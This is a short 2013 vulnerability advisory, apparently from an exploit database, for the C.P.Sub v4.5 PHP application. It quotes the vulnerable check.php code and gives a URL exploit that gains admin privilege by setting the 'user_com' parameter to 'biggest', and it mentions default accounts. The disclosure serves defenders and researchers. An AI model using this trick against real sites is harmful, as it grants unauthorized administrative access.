53 lines
No EOL
1.4 KiB
Python
Executable file
53 lines
No EOL
1.4 KiB
Python
Executable file
#!/usr/bin/python
|
|
#
|
|
#
|
|
####################################################################
|
|
#
|
|
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
|
|
# Date: 2013/6/27
|
|
# Exploit Author: Chako
|
|
# Vendor Homepage: http://www.cooltey.org/ping/php.php
|
|
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
|
|
# Version: <= v4.5
|
|
# Tested on: Windows 7
|
|
#
|
|
#
|
|
####################################################################
|
|
|
|
Improper Authentication:
|
|
==========================================
|
|
|
|
Description:
|
|
C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
|
|
Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.
|
|
|
|
|
|
/check.php (LINE: 36-44)
|
|
--------------------------------------------------------------
|
|
if($_GET[user_com] != "")
|
|
{
|
|
$user_com = $_GET[user_com];
|
|
}elseif($_POST[user_com] != "")
|
|
{
|
|
$user_com = $_POST[user_com];
|
|
}
|
|
if($user_com == "biggest")
|
|
{
|
|
--------------------------------------------------------------
|
|
|
|
|
|
Exploit:
|
|
--------------------------------------------------------------
|
|
|
|
change
|
|
http://Example_Target/info.php?cookie=yes&user_com=second
|
|
|
|
to
|
|
http://Example_Target/info.php?cookie=yes&user_com=biggest
|
|
|
|
|
|
|
|
Misconfiguration
|
|
==========================================
|
|
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
|
|
to access back-end management page. It could lead to further attack. |